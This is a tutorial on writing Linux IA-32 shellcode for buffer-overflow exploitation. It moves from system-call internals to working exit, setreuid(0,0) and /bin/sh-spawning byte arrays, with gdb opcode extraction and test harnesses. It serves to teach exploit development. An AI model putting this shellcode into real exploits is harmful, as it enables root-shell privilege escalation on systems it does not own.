
DESIGNING SHELLCODE DEMYSTIFIED

Original: murat at enderunix dot org
Chinese translation: PSHuang [PSNLAB]

Contents
  0x00 Foreword
  0x01 What's Shellcode?
  0x02 System Calls
  0x03 Shell Spawning Shellcode
  0x04 Last Word
  0x05 Greetings
  0x06 Bibliography

0x00 FOREWORD
In our previous paper, Buffer Overflows Demystified, we told you that there would be more papers
on these subjects. We kept our promise: here is the second paper in the series. It covers the
fundamentals of shellcode design and is specific to Linux 2.2 on IA-32. The basic principles apply to
all architectures, whereas the details obviously may not.

To understand what's going on, some C and assembly knowledge is required. Familiarity with virtual
memory and some operating system essentials, for example how a process is laid out in memory, will be
helpful. You MUST know what a setuid binary is, and of course you need to be able to at least use UNIX
systems. Experience with gdb and cc is a big plus. Keep the "IA-32 Intel® Architecture Software
Developer's Manual Volume 1: Basic Architecture" at hand. You can get it from here.

Recent versions of the paper can be found here.

0x01 WHAT'S SHELLCODE?
In our previous paper, I said several times that once we get control over the execution of the
target program, we can run any code we want. Let's recall:
"strcpy() copied large_one to foo, without bounds checking, filling the whole stack with A,
starting from the beginning of foo1, EBP-16.

Now that we could overwrite the return address, if we put the address of some other memory
segment, can we execute the instructions there? The answer is yes.

Assume that we place some /bin/sh spawning instructions on some memory address, and we put
that address on the function's return address that we overflow, we can spawn a shell, and most
probably, we will spawn a rootshell, since you'll be already interested with setuid binaries." [5]

Again, if you recall, the instructions the CPU runs are placed in some portion of memory. What we
do is simply place our code somewhere in memory and make EIP point to it.

We call these assembly instructions "the shellcode". To use them within an exploit, we put their
hexadecimal op-codes in a character array.

Several methods are available to get those instructions:
1. Write directly in hex code. (Translator's note: reportedly this is how jserv does it.)
2. Write the assembly instructions, then extract the op-codes.
3. Write in C, extract the assembly instructions and then the op-codes.

We'll first use the third method and try to run some system calls like exit. After that, we'll write
shellcode that spawns a new shell.

The code we'd like to run will usually execute a system program, e.g. spawning a root shell, or
binding a root shell to a newly created socket if the exploit runs remotely. When we talk about
"executing a program", we mean "calling a kernel service which is responsible for creating and
executing a new system process". These services run at the most privileged CPU level, namely kernel
mode, so we need an entry into the kernel to reach them. They are made available to user-space
programs via system calls. Thus, to understand what shellcode is all about, we first need to dive into
system calls.

0x02 SYSTEM CALLS
Entrances into the kernel can be categorized according to the event or action
that initiates them:

1. Hardware interrupt.
2. Hardware trap.
3. Software-initiated trap.

Hardware interrupts arise from external events, such as an I/O device needing attention or a clock
reporting the passage of time. Hardware interrupts occur asynchronously and may not relate to the
context of the currently executing process.

Hardware traps may be either synchronous or asynchronous, but are related to the currently executing
process. Examples of hardware traps are those generated as a result of an illegal arithmetic operation,
such as divide by zero.

Software-initiated traps are used by the system to force the scheduling of an event, such as process
rescheduling or network processing, as soon as possible. System calls are a special case of
software-initiated trap: the machine instruction used to initiate a system call typically causes a
hardware trap that is handled specially by the kernel. The most frequent trap into the kernel (after
clock processing) is a request to do a system call. The system call handler must do the following work:

1. Verify that the parameters to the system call are located at a valid user address, and copy them
   from the user's address space into the kernel.
2. Call a kernel routine that implements the system call. [2]

There are two mechanisms under Linux for implementing system calls:
1. lcall7/lcall27 call gates
2. INT 0x80 software interrupt

Native Linux programs use int 0x80, whilst binaries from foreign flavors of UNIX (Solaris, UnixWare 7
etc.) use the lcall7 mechanism. The name "lcall7" is historically misleading because it also covers
lcall27 (e.g. Solaris/x86), but the handler function is called lcall7_func.

When the system boots, the function arch/i386/kernel/traps.c:trap_init() is called. It sets up the IDT
(Interrupt Descriptor Table) so that vector 0x80 (of type 15, dpl 3) points to the address of the
system_call entry in arch/i386/kernel/entry.S.

When a userspace application makes a system call, the arguments are passed via registers and the
application executes the 'int 0x80' instruction. This causes a trap into kernel mode, and the processor
jumps to the system_call entry point in entry.S.

What this generally does is:
1. Save registers and conduct some sanity checking.
2. Call the particular system call handler function to handle the system call. [3]

The EAX register denotes the specific system call. The meaning of the other registers depends on the
value in EAX.

To give an example, let us assume that a process requests _exit. Before going into kernel mode, the
underlying library function sets EAX to 0x1, which denotes sys_exit, sets EBX to the parameter given to
exit(), and executes int 0x80. When the trap occurs, the kernel locates the appropriate handler
routine. In this scenario, since EAX is 0x1, kernel/exit.c:sys_exit is executed. This function operates
according to the value that is present in the EBX register.

Now that we've gone through the mechanisms involved in system calls and how they actually work, we can
start invoking them from our own assembly instructions. Once we have the instructions, we'll find
their hexadecimal opcodes, put them in an array and create our shellcode.

EXIT SHELLCODE

Let's first code in C, and see for ourselves:

$ export CFLAGS=-g

----------------------- c-exit.c ------------------------------
#include <stdlib.h>

int main(void)
{
    exit(0);    /* eventually reaches the _exit system call */
}
----------------------- c-exit.c ------------------------------

$ make c-exit
cc -g c-exit.c -o c-exit
$ gdb ./c-exit
(gdb) b main
Breakpoint 1 at 0x80483b7: file c-exit.c, line 5.
(gdb) r
Starting program: /home/balaban/sc/./c-exit
warning: Unable to find dynamic linker breakpoint function.
GDB will be unable to debug shared library initializers
and track explicitly loaded dynamic code.

Breakpoint 1, main () at c-exit.c:5


5 exit(0);
(gdb) disas _exit
Dump of assembler code for function _exit:
0x400a5ee0 <_exit>: mov %ebx,%edx
0x400a5ee2 <_exit+2>: mov 0x4(%esp,1),%ebx
0x400a5ee6 <_exit+6>: mov $0x1,%eax

0x400a5eeb <_exit+11>: int $0x80
--- snipped ---

End of assembler dump.


(gdb)

As you can see above, the standard library function exit sets EAX to 0x1 and loads EBX with the
parameter that was pushed onto the stack (the argument to the function, which is the actual exit
status).

So, here are the instructions for exit(0):

XOR %EBX, %EBX /* return code for exit(): set EBX to zero */
MOV $0x1, %EAX /* sys_exit */
INT $0x80      /* generate trap */

A user-friendly version of the Linux system call table can be found at the following link.

sys_exit is defined as follows:

%eax  Name      Source         %ebx  %ecx  %edx  %esi  %edi
1     sys_exit  kernel/exit.c  int   -     -     -     -

We can write the instructions inline in a C function:

----------------------- a-exit.c ------------------------------
int main(void)
{
    /* One instruction per string; adjacent literals are concatenated. */
    __asm__("xorl %ebx, %ebx\n\t"   /* EBX = 0, the exit status */
            "mov  $0x1, %eax\n\t"   /* EAX = 1, sys_exit        */
            "int  $0x80");          /* trap into the kernel     */
}
----------------------- a-exit.c ------------------------------

We can trace the system calls a program makes during execution with strace:

$ strace ./a-exit
execve("./a-exit", ["./a-exit"], [/* 32 vars */]) = 0
brk(0) = 0x80494d8

--- snipped ---

_exit(0) = ?
$

As you can see, exit(0) has been executed!

We can move on to another system call:
setreuid(0, 0)

Sometimes we may need "privilege restoration routines", which restore a process' root privileges
whenever it possesses them but they are temporarily unavailable for security reasons. These
routines are especially useful for exploiting vulnerabilities in certain setuid binaries, the ones
that revert but do not completely drop their elevated privileges. setreuid is one of them: it sets
the process' real and effective user ids. [4]

From the URI given above, you can get some information about this system call:

%eax  Name          Source        %ebx   %ecx   %edx  %esi  %edi
70    sys_setreuid  kernel/sys.c  uid_t  uid_t  -     -     -

The same principles apply here. We set EAX to 0x46, which is sys_setreuid's number,
EBX to the real userid and ECX to the effective userid.

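----------------------- a-setreuid.c ------------------------------
int main(void)
{
    __asm__("xorl %ebx, %ebx\n\t"   /* EBX = 0: real userid      */
            "xorl %ecx, %ecx\n\t"   /* ECX = 0: effective userid */
            "mov  $0x46, %eax\n\t"  /* EAX = 0x46: sys_setreuid  */
            "int  $0x80\n\t"        /* setreuid(0, 0)            */
            "xorl %ebx, %ebx\n\t"   /* EBX = 0: exit status      */
            "mov  $0x1, %eax\n\t"   /* EAX = 1: sys_exit         */
            "int  $0x80");          /* exit(0)                   */
}
----------------------- a-setreuid.c ------------------------------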

xorl %ebx, %ebx
Set the EBX register to 0. If you XOR a number with itself, you get zero.
Remember that EBX holds the real userid.

xorl %ecx, %ecx
ECX = effective userid = 0

mov $0x46, %eax
EAX = 0x46 (sys_setreuid).

int $0x80
Dive into kernel mode.

The remaining instructions are the ones for exit(0).

$ make a-setreuid
cc a-setreuid.c -o a-setreuid
$ su
# strace ./a-setreuid
execve("./a-setreuid", ["./a-setreuid"], [/* 31 vars */]) = 0
brk(0) = 0x80494e4

---- snipped ----

setreuid(0, 0) = 0
_exit(0) = ?
#

As you can see, first setreuid(0, 0) and then exit(0) has been executed. It's time to extract the
opcodes for these instructions. In GDB, the x/bx command shows one byte from the memory address we
specify, which is what we want. For a detailed walkthrough of x/bx, you can have a look here.

$ gdb ./a-setreuid
(gdb) disas main
Dump of assembler code for function main:
0x8048380 <main>: push %ebp
0x8048381 <main+1>: mov %esp,%ebp
0x8048383 <main+3>: xor %ebx,%ebx
0x8048385 <main+5>: xor %ecx,%ecx
0x8048387 <main+7>: mov $0x46,%eax
0x804838c <main+12>: int $0x80
0x804838e <main+14>: xor %ebx,%ebx
0x8048390 <main+16>: mov $0x1,%eax
0x8048395 <main+21>: int $0x80
0x8048397 <main+23>: leave
0x8048398 <main+24>: ret
End of assembler dump.
(gdb) x/bx main+3
0x8048383 <main+3>: 0x31
(gdb) x/bx main+4
0x8048384 <main+4>: 0xdb

(gdb) x/bx main+5
0x8048385 <main+5>: 0x31
(gdb) x/bx main+6
0x8048386 <main+6>: 0xc9
(gdb) x/bx main+7
0x8048387 <main+7>: 0xb8
(gdb) x/bx main+8
0x8048388 <main+8>: 0x46
(gdb) x/bx main+9
0x8048389 <main+9>: 0x00
(gdb) x/bx main+10
0x804838a <main+10>: 0x00
(gdb) x/bx main+11
0x804838b <main+11>: 0x00
(gdb) x/bx main+12
0x804838c <main+12>: 0xcd
(gdb) x/bx main+13
0x804838d <main+13>: 0x80
(gdb) x/bx main+14
0x804838e <main+14>: 0x31
(gdb) x/bx main+15
0x804838f <main+15>: 0xdb
(gdb) x/bx main+16
0x8048390 <main+16>: 0xb8
(gdb) x/bx main+17
0x8048391 <main+17>: 0x01
(gdb) x/bx main+18
0x8048392 <main+18>: 0x00
(gdb) x/bx main+19
0x8048393 <main+19>: 0x00
(gdb) x/bx main+20
0x8048394 <main+20>: 0x00
(gdb) x/bx main+21
0x8048395 <main+21>: 0xcd
(gdb) x/bx main+22
0x8048396 <main+22>: 0x80
(gdb)

Our shellcode:

----------------------- s-setreuid.c ------------------------------
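char sc[] = "\x31\xdb"             /* xor %ebx, %ebx  */
            "\x31\xc9"             /* xor %ecx, %ecx  */
            "\xb8\x46\x00\x00\x00" /* mov $0x46, %eax */
            "\xcd\x80"             /* int $0x80       */
            "\x31\xdb"             /* xor %ebx, %ebx  */
            "\xb8\x01\x00\x00\x00" /* mov $0x1, %eax  */
            "\xcd\x80";            /* int $0x80       */

int main(void)
{
    /* Treat the byte array as a function and call it. This relies on the
       data segment being executable, as it is on the Linux 2.2 / IA-32
       setup used in this paper. */
    void (*fp)(void);

    fp = (void (*)(void))sc;
    fp();
    return 0;
}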
----------------------- s-setreuid.c ------------------------------

$ su
# make s-setreuid
cc s-setreuid.c -o s-setreuid
# strace ./s-setreuid
execve("./s-setreuid", ["./s-setreuid"], [/* 31 vars */]) = 0
brk(0) = 0x80494f8

---- snipped

setreuid(0, 0) = 0
_exit(0) = ?
#

As you can see, the shellcode has the same effect.

0x03 SHELL SPAWNING SHELLCODE

This is the sweetest part. Based on what we've learnt so far, let's try
coding shellcode that spawns an interactive shell. The first thing we should
do is analyze the execve system call in a little more detail. Go to the URI I've
given above and get some idea:

%eax  Name        Source                      %ebx     %ecx  %edx  %esi  %edi
11    sys_execve  arch/i386/kernel/process.c  pt_regs  -     -     -     -

The table says EBX has the address of a pt_regs structure, which is not very explanatory.
The handler is in arch/i386/kernel/process.c. Let's see it:

/*
 * sys_execve() executes a new program.
 */
asmlinkage int sys_execve(struct pt_regs regs)
{
        int error;
        char * filename;

        filename = getname((char *) regs.ebx);
        error = PTR_ERR(filename);
        if (IS_ERR(filename))
                goto out;
        error = do_execve(filename, (char **) regs.ecx, (char **) regs.edx,
                          &regs);
        if (error == 0)
                current->ptrace &= ~PT_DTRACE;
        putname(filename);
out:
        return error;
}

As you'll notice, the EBX register holds the address of the command, which in this scenario is the
address of the string "/bin/sh". We cannot get any more clues as to what ECX and EDX do. However, the
routine calls another function, do_execve, and passes these addresses to it. To understand what they
really are, we need to go further:

From fs/exec.c:

int do_execve(char * filename, char ** argv, char ** envp, struct pt_regs * regs)

Here, it's obvious that ECX has the address of argv[] and EDX has the address of envp[]. Both are
arrays of pointers to character strings. The environment can be NULL, which means we can have a zero
in EDX; however, we need to supply at least argv[0], the name of the program. Since argv[] must be
NULL terminated, argv[1] will be zero.

So we'll need to:
* have the string "/bin/sh" somewhere in memory
* write the address of that string into EBX
* create a char ** array which holds the address of the
  "/bin/sh" string followed by a NULL pointer
* write the address of that char ** array into ECX
* write zero into EDX
* issue int 0x80 and generate the trap

Let's start typing:

First write a NULL-terminated "/bin/sh" into memory. We can
do this by pushing a NULL and then the adjacent "/bin/sh" onto the stack:

Create a NULL in EAX. This will be used for terminating the string:
xorl %eax, %eax

Push that zero (NULL) onto the stack:
pushl %eax

Push "//sh". The extra slash pads the string to two 4-byte pushes; the kernel treats "/bin//sh"
the same as "/bin/sh":
pushl $0x68732f2f

Push "/bin":
pushl $0x6e69622f

At this moment, ESP points at the starting address of "/bin//sh".
We can safely write this into EBX:
movl %esp, %ebx

EAX is still zero. We can use it to terminate char **argv:
pushl %eax

If we push the address of "/bin//sh" onto the stack too, the address of the argv pointer
array will be in ESP. In this way, we have created char **argv in memory:
pushl %ebx

And write the address of argv into ECX:
movl %esp, %ecx

EDX may happily be zero:
xorl %edx, %edx

sys_execve = 0xb. That should be in EAX. EAX is already zero, so setting its low byte is enough:
movb $0xb, %al

Trigger the interrupt and enter kernel mode:
int $0x80

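----------------------- sc.c ------------------------------
int main(void)
{
    __asm__("xorl  %eax, %eax\n\t"      /* EAX = 0                         */
            "pushl %eax\n\t"            /* string terminator               */
            "pushl $0x68732f2f\n\t"     /* "//sh"                          */
            "pushl $0x6e69622f\n\t"     /* "/bin"                          */
            "movl  %esp, %ebx\n\t"      /* EBX = address of "/bin//sh"     */
            "pushl %eax\n\t"            /* argv[1] = NULL                  */
            "pushl %ebx\n\t"            /* argv[0] = address of "/bin//sh" */
            "movl  %esp, %ecx\n\t"      /* ECX = argv                      */
            "xorl  %edx, %edx\n\t"      /* EDX = envp = NULL               */
            "movb  $0xb, %al\n\t"       /* EAX = 0xb, sys_execve           */
            "int   $0x80");             /* trap into the kernel            */
}
----------------------- sc.c ------------------------------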

$ make sc
cc -g sc.c -o sc
$ ./sc
sh-2.04$

It works. Let's find the opcodes line by line and construct our shellcode:

$ gdb ./sc
(gdb) disas main
Dump of assembler code for function main:

0x8048380 <main>: push %ebp
0x8048381 <main+1>: mov %esp,%ebp
0x8048383 <main+3>: xor %eax,%eax
0x8048385 <main+5>: push %eax
0x8048386 <main+6>: push $0x68732f2f
0x804838b <main+11>: push $0x6e69622f
0x8048390 <main+16>: mov %esp,%ebx
0x8048392 <main+18>: push %eax
0x8048393 <main+19>: push %ebx
0x8048394 <main+20>: mov %esp,%ecx
0x8048396 <main+22>: xor %edx,%edx
0x8048398 <main+24>: mov $0xb,%al
0x804839a <main+26>: int $0x80
0x804839c <main+28>: leave
0x804839d <main+29>: ret
End of assembler dump.
(gdb) x/bx main+3
0x8048383 <main+3>: 0x31
(gdb) x/bx main+4
0x8048384 <main+4>: 0xc0
(gdb)
0x8048385 <main+5>: 0x50
(gdb)
0x8048386 <main+6>: 0x68
(gdb)
0x8048387 <main+7>: 0x2f
(gdb)
0x8048388 <main+8>: 0x2f
(gdb)
0x8048389 <main+9>: 0x73
(gdb)
0x804838a <main+10>: 0x68
(gdb)
0x804838b <main+11>: 0x68
(gdb)
0x804838c <main+12>: 0x2f
(gdb)
0x804838d <main+13>: 0x62
(gdb)
0x804838e <main+14>: 0x69

(gdb)
0x804838f <main+15>: 0x6e
(gdb)
0x8048390 <main+16>: 0x89
(gdb)
0x8048391 <main+17>: 0xe3
(gdb)
0x8048392 <main+18>: 0x50
(gdb)
0x8048393 <main+19>: 0x53
(gdb)
0x8048394 <main+20>: 0x89
(gdb)
0x8048395 <main+21>: 0xe1
(gdb)
0x8048396 <main+22>: 0x31
(gdb)
0x8048397 <main+23>: 0xd2
(gdb)
0x8048398 <main+24>: 0xb0
(gdb)
0x8048399 <main+25>: 0x0b
(gdb)
0x804839a <main+26>: 0xcd
(gdb)
0x804839b <main+27>: 0x80
(gdb)

----------------------- s-sc.c ------------------------------
char sc[] =
    "\x31\xc0"             /* xor %eax, %eax   */
    "\x50"                 /* push %eax        */
    "\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */
    "\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */
    "\x89\xe3"             /* mov %esp,%ebx    */
    "\x50"                 /* push %eax        */
    "\x53"                 /* push %ebx        */
    "\x89\xe1"             /* mov %esp,%ecx    */
    "\x31\xd2"             /* xor %edx,%edx    */
    "\xb0\x0b"             /* mov $0xb,%al     */
    "\xcd\x80";            /* int $0x80        */

int main(void)
{
    /* Call the byte array as a function. This relies on the data segment
       being executable, as on the Linux 2.2 / IA-32 setup used here. */
    void (*fp)(void);

    fp = (void (*)(void))sc;
    fp();
    return 0;
}
----------------------- s-sc.c ------------------------------

$ make s-sc
cc -g s-sc.c -o s-sc
$ ./s-sc
sh-2.04$

0x04 LAST WORD
Using the aforementioned logic, one can construct millions of
fantastic shellcodes. All that is necessary is a little bit of attention.

- Murat Balaban
murat at enderunix dot org

0x05 GREETINGS
a, da, aleph1, lsd-pl guys, Mr. Brown, cronos, gargoyle, matsuri

0x06 BIBLIOGRAPHY

[1] Linux Kernel Internals, Beck M et al, Addison Wesley, 2nd edition, 1997.
[2] The Design and Implementation of the 4.4BSD Operating System, McKusick M et al, Addison Wesley, 1996.
[3] IA-32 Intel® Architecture Software Developer's Manuals
[4] Unix Assembly Codes Development for Vulnerabilities Illustration Purposes
[5] Buffer Overflows Demystified
[6] Linux 2.2 Kernel Sources